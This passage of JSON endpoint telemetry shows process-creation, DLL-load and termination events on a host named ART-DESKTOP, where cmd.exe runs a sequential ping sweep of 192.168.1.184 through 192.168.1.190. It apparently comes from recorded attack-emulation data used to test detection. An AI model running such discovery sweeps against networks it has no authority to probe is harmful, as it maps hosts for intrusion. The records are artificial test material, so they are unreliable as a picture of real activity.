"{42FC7E13-CBA8-5C05-0000-00100B565301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.184", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1748, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572886980000, - "unique_pid": "{42FC7E13-CBA8-5C05-0000-001087585301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 1748, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572886980000, - "unique_pid": "{42FC7E13-CBA8-5C05-0000-001087585301}" - }, - { - 
"event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1748, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572886980000, - "unique_pid": "{42FC7E13-CBA8-5C05-0000-001087585301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1748, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572886980000, - "unique_pid": "{42FC7E13-CBA8-5C05-0000-001087585301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1748, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572886980000, - "unique_pid": "{42FC7E13-CBA8-5C05-0000-001087585301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1748, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572886980000, - "unique_pid": "{42FC7E13-CBA8-5C05-0000-001087585301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 1748, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572886980000, - "unique_pid": "{42FC7E13-CBA8-5C05-0000-001087585301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 1748, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572886980000, - "unique_pid": "{42FC7E13-CBA8-5C05-0000-001087585301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - 
"pid": 1748, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572886980000, - "unique_pid": "{42FC7E13-CBA8-5C05-0000-001087585301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 1748, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572886980000, - "unique_pid": "{42FC7E13-CBA8-5C05-0000-001087585301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 1748, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572886980000, - "unique_pid": "{42FC7E13-CBA8-5C05-0000-001087585301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 1748, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572886980000, - "unique_pid": "{42FC7E13-CBA8-5C05-0000-001087585301}" - }, - { - "event_type": "process", - "pid": 1748, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572891830000, - "unique_pid": "{42FC7E13-CBA8-5C05-0000-001087585301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.185", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4832, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572891980000, - "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010F85A5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - 
"image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4832, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572891980000, - "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010F85A5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4832, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572891980000, - "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010F85A5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4832, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572891980000, - "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010F85A5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4832, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572891980000, - "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010F85A5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4832, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572891980000, - "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010F85A5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4832, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572891980000, - "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010F85A5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4832, - "process_name": 
"PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572891980000, - "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010F85A5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4832, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572891980000, - "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010F85A5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4832, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572891980000, - "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010F85A5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4832, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572891980000, - "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010F85A5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4832, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572891980000, - "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010F85A5301}" - }, - { - "event_type": "process", - "pid": 4832, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572896990000, - "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010F85A5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.186", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1532, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", 
- "timestamp": 131883572897130000, - "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010795D5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 1532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572897140000, - "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010795D5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572897140000, - "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010795D5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572897140000, - "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010795D5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572897140000, - "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010795D5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572897140000, - "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010795D5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 1532, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572897140000, - "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010795D5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 1532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572897140000, - "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010795D5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 1532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572897140000, - "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010795D5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 1532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572897140000, - "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010795D5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 1532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572897140000, - "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010795D5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 1532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572897300000, - "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010795D5301}" - }, - { - "event_type": "process", - "pid": 1532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572901830000, - "unique_pid": "{42FC7E13-CBA9-5C05-0000-0010795D5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.187", 
- "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3068, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572901980000, - "unique_pid": "{42FC7E13-CBAA-5C05-0000-0010EA5F5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572901980000, - "unique_pid": "{42FC7E13-CBAA-5C05-0000-0010EA5F5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572901980000, - "unique_pid": "{42FC7E13-CBAA-5C05-0000-0010EA5F5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572901980000, - "unique_pid": "{42FC7E13-CBAA-5C05-0000-0010EA5F5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572901980000, - "unique_pid": "{42FC7E13-CBAA-5C05-0000-0010EA5F5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - 
"timestamp": 131883572901980000, - "unique_pid": "{42FC7E13-CBAA-5C05-0000-0010EA5F5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572901980000, - "unique_pid": "{42FC7E13-CBAA-5C05-0000-0010EA5F5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572901980000, - "unique_pid": "{42FC7E13-CBAA-5C05-0000-0010EA5F5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572901980000, - "unique_pid": "{42FC7E13-CBAA-5C05-0000-0010EA5F5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572901980000, - "unique_pid": "{42FC7E13-CBAA-5C05-0000-0010EA5F5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572901980000, - "unique_pid": "{42FC7E13-CBAA-5C05-0000-0010EA5F5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572901980000, - "unique_pid": "{42FC7E13-CBAA-5C05-0000-0010EA5F5301}" - }, - { - "event_type": "process", - 
"pid": 3068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572906830000, - "unique_pid": "{42FC7E13-CBAA-5C05-0000-0010EA5F5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.188", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7836, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572906980000, - "unique_pid": "{42FC7E13-CBAA-5C05-0000-001067625301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7836, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572906980000, - "unique_pid": "{42FC7E13-CBAA-5C05-0000-001067625301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7836, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572906980000, - "unique_pid": "{42FC7E13-CBAA-5C05-0000-001067625301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7836, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572906980000, - "unique_pid": "{42FC7E13-CBAA-5C05-0000-001067625301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7836, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572906980000, - 
"unique_pid": "{42FC7E13-CBAA-5C05-0000-001067625301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7836, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572906980000, - "unique_pid": "{42FC7E13-CBAA-5C05-0000-001067625301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7836, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572906980000, - "unique_pid": "{42FC7E13-CBAA-5C05-0000-001067625301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7836, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572906980000, - "unique_pid": "{42FC7E13-CBAA-5C05-0000-001067625301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7836, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572906980000, - "unique_pid": "{42FC7E13-CBAA-5C05-0000-001067625301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7836, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572906980000, - "unique_pid": "{42FC7E13-CBAA-5C05-0000-001067625301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7836, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572906980000, - "unique_pid": "{42FC7E13-CBAA-5C05-0000-001067625301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - 
"image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7836, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572906980000, - "unique_pid": "{42FC7E13-CBAA-5C05-0000-001067625301}" - }, - { - "event_type": "process", - "pid": 7836, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572911990000, - "unique_pid": "{42FC7E13-CBAA-5C05-0000-001067625301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.189", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3136, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572912130000, - "unique_pid": "{42FC7E13-CBAB-5C05-0000-0010DA645301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3136, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572912140000, - "unique_pid": "{42FC7E13-CBAB-5C05-0000-0010DA645301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3136, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572912140000, - "unique_pid": "{42FC7E13-CBAB-5C05-0000-0010DA645301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3136, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572912140000, - "unique_pid": 
"{42FC7E13-CBAB-5C05-0000-0010DA645301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3136, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572912140000, - "unique_pid": "{42FC7E13-CBAB-5C05-0000-0010DA645301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3136, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572912140000, - "unique_pid": "{42FC7E13-CBAB-5C05-0000-0010DA645301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3136, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572912140000, - "unique_pid": "{42FC7E13-CBAB-5C05-0000-0010DA645301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3136, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572912140000, - "unique_pid": "{42FC7E13-CBAB-5C05-0000-0010DA645301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3136, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572912140000, - "unique_pid": "{42FC7E13-CBAB-5C05-0000-0010DA645301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3136, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572912140000, - "unique_pid": "{42FC7E13-CBAB-5C05-0000-0010DA645301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - 
"image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3136, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572912140000, - "unique_pid": "{42FC7E13-CBAB-5C05-0000-0010DA645301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3136, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572912140000, - "unique_pid": "{42FC7E13-CBAB-5C05-0000-0010DA645301}" - }, - { - "event_type": "process", - "pid": 3136, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572916990000, - "unique_pid": "{42FC7E13-CBAB-5C05-0000-0010DA645301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.190", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 260, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572917130000, - "unique_pid": "{42FC7E13-CBAB-5C05-0000-001073675301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 260, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572917140000, - "unique_pid": "{42FC7E13-CBAB-5C05-0000-001073675301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 260, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572917140000, - "unique_pid": "{42FC7E13-CBAB-5C05-0000-001073675301}" - 
}, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 260, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572917140000, - "unique_pid": "{42FC7E13-CBAB-5C05-0000-001073675301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 260, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572917140000, - "unique_pid": "{42FC7E13-CBAB-5C05-0000-001073675301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 260, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572917140000, - "unique_pid": "{42FC7E13-CBAB-5C05-0000-001073675301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 260, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572917140000, - "unique_pid": "{42FC7E13-CBAB-5C05-0000-001073675301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 260, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572917140000, - "unique_pid": "{42FC7E13-CBAB-5C05-0000-001073675301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 260, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572917140000, - "unique_pid": "{42FC7E13-CBAB-5C05-0000-001073675301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": 
